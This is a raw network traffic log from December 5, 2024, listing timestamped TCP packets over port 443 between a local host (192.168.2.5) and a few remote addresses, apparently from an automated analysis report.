                                                                                        Dec 5, 2024 22:50:44.515212059 CET4434986913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:44.515281916 CET49869443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:44.515477896 CET49869443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:44.515492916 CET4434986913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:44.515506983 CET49869443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:44.515511990 CET4434986913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:44.522373915 CET49879443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:44.522418022 CET4434987913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:44.522551060 CET49879443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:44.522972107 CET49879443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:44.522986889 CET4434987913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.018234015 CET4434987013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.018790007 CET49870443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.018830061 CET4434987013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.019227982 CET49870443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.019234896 CET4434987013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.233453989 CET4434987113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.233987093 CET49871443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.234015942 CET4434987113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.234421968 CET49871443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.234430075 CET4434987113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.373743057 CET49874443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:45.374085903 CET49875443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:45.374151945 CET49877443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:45.374267101 CET49876443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:45.375503063 CET49882443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:45.375536919 CET44349882172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.375597000 CET49882443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:45.376827002 CET49882443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:45.376833916 CET44349882172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.377355099 CET49883443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:45.377401114 CET44349883172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.377521038 CET49883443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:45.378386021 CET49883443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:45.378408909 CET44349883172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.406091928 CET4434987213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.406610012 CET49872443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.406640053 CET4434987213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.407109022 CET49872443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.407124996 CET4434987213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.420942068 CET4434987313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.421899080 CET49873443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.421911955 CET4434987313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.422322035 CET49873443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.422327995 CET4434987313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.452965975 CET4434987013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.453026056 CET4434987013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.453313112 CET49870443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.453353882 CET49870443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.453367949 CET4434987013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.453393936 CET49870443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.453398943 CET4434987013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.456279993 CET49884443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.456324100 CET4434988413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.456398964 CET49884443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.456540108 CET49884443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.456554890 CET4434988413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.669272900 CET4434987113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.669332981 CET4434987113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.669533968 CET49871443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.669702053 CET49871443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.669713974 CET4434987113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.669724941 CET49871443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.669728994 CET4434987113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.673443079 CET49885443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.673486948 CET4434988513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.675036907 CET49885443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.675199032 CET49885443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.675209999 CET4434988513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.855894089 CET4434987313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.855953932 CET4434987313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.856260061 CET49873443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.856287956 CET49873443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.856295109 CET4434987313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.856304884 CET49873443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.856309891 CET4434987313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.856420040 CET4434987213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.856477976 CET4434987213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.856530905 CET49872443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.856898069 CET49872443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.856915951 CET4434987213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.856930971 CET49872443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.856935978 CET4434987213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.859391928 CET49886443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.859395981 CET49887443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.859433889 CET4434988713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.859440088 CET4434988613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.859514952 CET49886443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.859518051 CET49887443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.859639883 CET49886443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.859661102 CET4434988613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:45.859666109 CET49887443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:45.859679937 CET4434988713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:46.239067078 CET4434987913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:46.239784002 CET49879443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:46.239810944 CET4434987913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:46.240415096 CET49879443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:46.240423918 CET4434987913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:46.677480936 CET4434987913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:46.677552938 CET4434987913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:46.677611113 CET49879443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:46.763079882 CET49879443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:46.763113976 CET4434987913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:46.763129950 CET49879443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:46.763138056 CET4434987913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:46.773152113 CET49888443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:46.773199081 CET4434988813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:46.773272991 CET49888443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:46.773389101 CET49888443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:46.773399115 CET4434988813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.067220926 CET44349882172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.067327976 CET49882443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.068003893 CET44349882172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.068058014 CET49882443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.069359064 CET44349883172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.069453001 CET49883443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.070113897 CET44349883172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.070166111 CET49883443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.077131033 CET49882443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.077142000 CET44349882172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.077215910 CET49883443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.077228069 CET44349883172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.077378035 CET44349882172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.077421904 CET49882443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.077455997 CET44349883172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.077501059 CET49883443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.077796936 CET49882443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.081502914 CET49883443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.123339891 CET44349882172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.127341986 CET44349883172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.171113968 CET4434988413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.171668053 CET49884443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.171699047 CET4434988413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.172277927 CET49884443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.172283888 CET4434988413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.391736984 CET4434988513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.392313957 CET49885443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.392334938 CET4434988513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.392895937 CET49885443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.392899990 CET4434988513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.577131033 CET4434988613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.577716112 CET49886443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.577744007 CET4434988613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.578006029 CET4434988713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.578218937 CET49886443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.578228951 CET4434988613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.578435898 CET49887443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.578466892 CET4434988713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.578753948 CET49887443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.578758955 CET4434988713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.640916109 CET4434988413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.640979052 CET4434988413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.641190052 CET49884443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.641216040 CET49884443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.641231060 CET4434988413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.641239882 CET49884443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.641243935 CET4434988413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.644131899 CET49890443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.644174099 CET4434989013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.644256115 CET49890443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.644418001 CET49890443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.644429922 CET4434989013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.827734947 CET4434988513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.827816010 CET4434988513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.827908993 CET49885443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.831561089 CET49885443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.831561089 CET49885443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.831592083 CET4434988513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.831604958 CET4434988513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.834127903 CET49891443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.834166050 CET4434989113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.834242105 CET49891443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.834503889 CET49891443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:47.834513903 CET4434989113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.969870090 CET44349882172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.970740080 CET44349882172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.970818043 CET49882443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.970992088 CET49882443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.971004009 CET44349882172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.971568108 CET49892443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.971621990 CET44349892172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.973016977 CET49893443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:47.973025084 CET44349893142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.973072052 CET49892443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.973103046 CET49893443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:47.973334074 CET49893443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:47.973349094 CET44349893142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.973515034 CET49892443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.973526001 CET44349892172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.980012894 CET44349883172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.981035948 CET44349883172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.981110096 CET49883443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.981169939 CET49883443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.981187105 CET44349883172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.981545925 CET49894443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.981556892 CET44349894172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.981616020 CET49894443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.981616020 CET49895443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:47.981636047 CET44349895142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.981791973 CET49894443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:47.981803894 CET44349894172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:47.981812954 CET49895443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:47.981973886 CET49895443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:47.981980085 CET44349895142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.011069059 CET4434988613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.011137962 CET4434988613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.011210918 CET49886443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.011429071 CET49886443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.011450052 CET4434988613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.011461020 CET49886443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.011466026 CET4434988613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.012152910 CET4434988713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.012217999 CET4434988713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.012356997 CET49887443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.012538910 CET49887443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.012556076 CET4434988713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.012567043 CET49887443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.012572050 CET4434988713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.014862061 CET49896443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.014904022 CET4434989613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.015048027 CET49897443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.015080929 CET49896443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.015083075 CET4434989713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.015136957 CET49897443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.015270948 CET49896443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.015275955 CET49897443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.015290022 CET4434989613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.015290022 CET4434989713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.502163887 CET4434988813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.505845070 CET49888443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.505872011 CET4434988813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.506354094 CET49888443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.506359100 CET4434988813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.937326908 CET4434988813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.937392950 CET4434988813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.937602043 CET49888443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.937769890 CET49888443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.937793970 CET4434988813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.937819958 CET49888443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.937825918 CET4434988813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.940730095 CET49900443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.940774918 CET4434990013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:48.940870047 CET49900443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.941045046 CET49900443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:48.941056967 CET4434990013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.360084057 CET4434989013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.385562897 CET49890443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.385621071 CET4434989013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.386523008 CET49890443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.386529922 CET4434989013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.547888041 CET4434989113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.591690063 CET49891443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.615849018 CET49891443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.615860939 CET4434989113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.621239901 CET49891443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.621244907 CET4434989113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.662430048 CET44349892172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.665535927 CET49892443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:49.668004036 CET44349893142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.668103933 CET49893443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:49.673271894 CET44349895142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.673341036 CET49895443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:49.689503908 CET49892443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:49.689516068 CET44349892172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.702028990 CET49893443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:49.702042103 CET44349893142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.702291012 CET44349893142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.702395916 CET49893443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:49.703113079 CET49892443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:49.703118086 CET44349892172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.703300953 CET49893443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:49.706259966 CET49895443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:49.706269026 CET44349895142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.706454039 CET44349895142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.706501007 CET49895443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:49.709675074 CET49895443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:49.730926037 CET4434989613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.731291056 CET4434989713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.735097885 CET49896443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.735126972 CET4434989613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.735717058 CET49896443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.735723972 CET4434989613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.736047983 CET49897443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.736072063 CET4434989713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.736500025 CET49897443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.736504078 CET4434989713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.747330904 CET44349893142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.755333900 CET44349895142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.794611931 CET4434989013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.794713974 CET4434989013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.794799089 CET49890443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.801871061 CET49890443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.801896095 CET4434989013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.801908016 CET49890443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.801914930 CET4434989013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.864727020 CET44349894172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.865597010 CET49894443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:49.865714073 CET49901443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.865734100 CET4434990113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.866192102 CET49901443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.867213964 CET49894443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:49.867218018 CET44349894172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.867860079 CET49901443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.867872000 CET4434990113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.869499922 CET49894443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:49.869503021 CET44349894172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.981656075 CET4434989113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.981708050 CET4434989113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.981812000 CET49891443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.982072115 CET49891443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.982081890 CET4434989113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.982089996 CET49891443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.982095003 CET4434989113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.986032963 CET49902443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.986061096 CET4434990213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:49.986149073 CET49902443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.986423016 CET49902443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:49.986437082 CET4434990213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:50.254436970 CET4434989613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:50.254446983 CET4434989713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:50.254489899 CET4434989613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:50.254497051 CET4434989713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:50.254534006 CET49896443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:50.254549980 CET49897443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:50.254800081 CET49896443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:50.254801989 CET49897443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:50.254816055 CET4434989713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:50.254817009 CET4434989613.107.246.63192.168.2.5
